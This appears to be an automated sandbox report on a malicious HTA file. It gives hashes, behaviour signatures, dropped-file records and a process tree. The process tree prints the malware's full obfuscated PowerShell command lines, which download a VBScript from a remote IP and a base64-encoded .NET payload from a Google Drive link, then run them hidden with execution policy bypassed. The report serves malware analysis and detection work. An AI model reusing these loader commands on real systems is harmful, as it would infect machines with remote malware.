Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29-10-2024 12:17
Static task
static1
Behavioral task
behavioral1
Sample
nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
Resource
win10v2004-20241007-en
General
-
Target
nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
-
Size
131KB
-
MD5
07a93908c3113536577c9c5b734a0af0
-
SHA1
794af14ec431e796ca6b61ed2094f623b86d77a9
-
SHA256
809e92422295976379070a5f2bb56313ca401b52d78b5d78134a08fcfd781202
-
SHA512
34ef8170d518afbf42bc16a0759f3609153338e6e4bbc1ce05e94933e13ce4f6c1c8f5de7aedfe5f675311f593d5cbe377908815922d55a076eaa7c35493ba79
-
SSDEEP
96:4vCt72QeBoCn7iY1opReQiY7ERPI/T5eodWQ:4vCF2QeaCmsoMY7MnAWQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2692 PoWerShELL.eXE 6 1036 powershell.exe 8 1036 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2028 powershell.exe 1036 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2692 PoWerShELL.eXE 1836 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoWerShELL.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2692 PoWerShELL.eXE 1836 powershell.exe 2692 PoWerShELL.eXE 2692 PoWerShELL.eXE 2028 powershell.exe 1036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2692 PoWerShELL.eXE Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1724 wrote to memory of 2692 1724 mshta.exe 30 PID 1724 wrote to memory of 2692 1724 mshta.exe 30 PID 1724 wrote to memory of 2692 1724 mshta.exe 30 PID 1724 wrote to memory of 2692 1724 mshta.exe 30 PID 2692 wrote to memory of 1836 2692 PoWerShELL.eXE 32 PID 2692 wrote to memory of 1836 2692 PoWerShELL.eXE 32 PID 2692 wrote to memory of 1836 2692 PoWerShELL.eXE 32 PID 2692 wrote to memory of 1836 2692 PoWerShELL.eXE 32 PID 2692 wrote to memory of 2740 2692 PoWerShELL.eXE 33 PID 2692 wrote to memory of 2740 2692 PoWerShELL.eXE 33 PID 2692 wrote to memory of 2740 2692 PoWerShELL.eXE 33 PID 2692 wrote to memory of 2740 2692 PoWerShELL.eXE 33 PID 2740 wrote to memory of 2952 2740 csc.exe 34 PID 2740 wrote to memory of 2952 2740 csc.exe 34 PID 2740 wrote to memory of 2952 2740 csc.exe 34 PID 2740 wrote to memory of 2952 2740 csc.exe 34 PID 2692 wrote to memory of 3068 2692 PoWerShELL.eXE 36 PID 2692 wrote to memory of 3068 2692 PoWerShELL.eXE 36 PID 2692 wrote to memory of 3068 2692 PoWerShELL.eXE 36 PID 2692 wrote to memory of 3068 2692 PoWerShELL.eXE 36 PID 3068 wrote to memory of 2028 3068 WScript.exe 37 PID 3068 wrote to memory of 2028 3068 WScript.exe 37 PID 3068 wrote to memory of 2028 3068 WScript.exe 37 PID 3068 wrote to memory of 2028 3068 WScript.exe 37 PID 2028 wrote to memory of 1036 2028 powershell.exe 39 PID 2028 wrote to memory of 1036 2028 powershell.exe 39 PID 2028 wrote to memory of 1036 2028 powershell.exe 39 PID 2028 wrote to memory of 1036 2028 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE"C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x42fpnjy.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AB4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8AB3.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b0b72fcf0026cd6682e1e3563c62cebf
SHA190a198c0044bfbe28584c77a1268f05294d85527
SHA25645dba0d7fa853be4c8a0eb1d061384bd0db0d9f57a81903a98cfd7dfface8c08
SHA5126f7b62809d3443cdc47f4822146612db13637087befbaaa2342e1830fb1f2cef873153ac3bfbb5851de71c168eef7919885db93e4b138571830e9d10f0ee6b2a
-
Filesize
3KB
MD5dd6e4513b2e133abb449997925cefbd2
SHA1703be0b5ab1675eafe7920423527d93b85b84bff
SHA25631a03dc9e321e20b8590a0a92940ddd04b6569aa3a742afb3c5e88b71f6acd21
SHA512b8171dd059bcf00c8eb204f3c301f116903ce80293b863b462e15e08f6ac367b6948f11fb151881fd8002e69238377a631203db4be5986c9fa2963a43d5d0f46
-
Filesize
7KB
MD5dc648b72c594cb1a03995ab0d95c3748
SHA1eda241790485f054cf85a6871e6d3f697534a266
SHA25644135793881d359e7569f7b229892c463820d37932c233093a980400229eae00
SHA51244437f7c84e644a0b83193b7c47f5c1f2efddf9df1e4ed25078c3bdc6c67a4f8e2b0bbc898ba5385cf986c74ad9f04922669542f2cda7f4c3f687cc03badf69b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c45d6dce016a4f81260de0ca4534940c
SHA11b7bee188328c32d8f3e33181a8f4f06dc66a000
SHA256405badae793d0bd4fb1ca82d0a9baf36c9d5d44556b2d6008e49344494e51ae0
SHA51253956b5a8cb9a2245a58f39b0d667cb554e8fcf218490110f41278dae829813a592a78d148803f4c1c7003fb83fef4ac79d69f2505a2e61e52dfe9ac6d6c1a40
-
Filesize
137KB
MD5bf515f00df29b4be31ac6e43ab05cd88
SHA129073164d5fdfd336c332321ebd8c01920438a8b
SHA25650b9f7f3880e858ac733e7a7fb6b679e699c8bc9553948d04b2c15194b7520dc
SHA5126ebb327de4fd7dc7d348ec32c7d7cc9d79bd2753fae2e29f7910e27d52091c6765e6ec6c0e982156661e9b80fe223c831cc739956624ef66262adffa1174ada7
-
Filesize
652B
MD57beb367a026c3ae036ca9c854a52938e
SHA144e5d47186b69bdf72f8ef392ffdc397a4438579
SHA2560513e5f905d6c373aa983adc4bb0a6a165eb0f31d360789ad8a79b4aa2623676
SHA5127d36e9ff5cd792f811e595fe33148ec501e44863b3aebd570691af2c669c51f8a98827294b676b88f428f93bb4b4cdcab036943512260e0eaae8f045d5abc74f
-
Filesize
462B
MD5bf57b8e732d7b6222960bf1d5dd5df18
SHA10cda321126a9876c2881199b2940c05492b0d94f
SHA256f77463e3272af620bc1620c10233f07a3e1c43b77d053a3477a92579b912ccfc
SHA5129ed1f51736815946772533e380020b0de4c449aaa72db6b2ce29d7eab458216dd8fa9b9333a07164c72290d758412dcbab51099da031ed465ee62f73a14cfabb
-
Filesize
309B
MD57e22b540e64920d5ac0458fe3f502bd5
SHA1d48c6e50273b4ce0a4a9eee16b39a8c8cdd6d7a6
SHA256ab041e688887801b573c580b110f8912c4c61fd5f5732404f85fbcd30fc08a79
SHA512123b2d45bf9155804ba7bb169500bf318f0600e750ba8926fe5d6edcd694b92fb1f6ca94b9d09f78d4baf909925739403aed23e05e5057ba05d1f21422358c55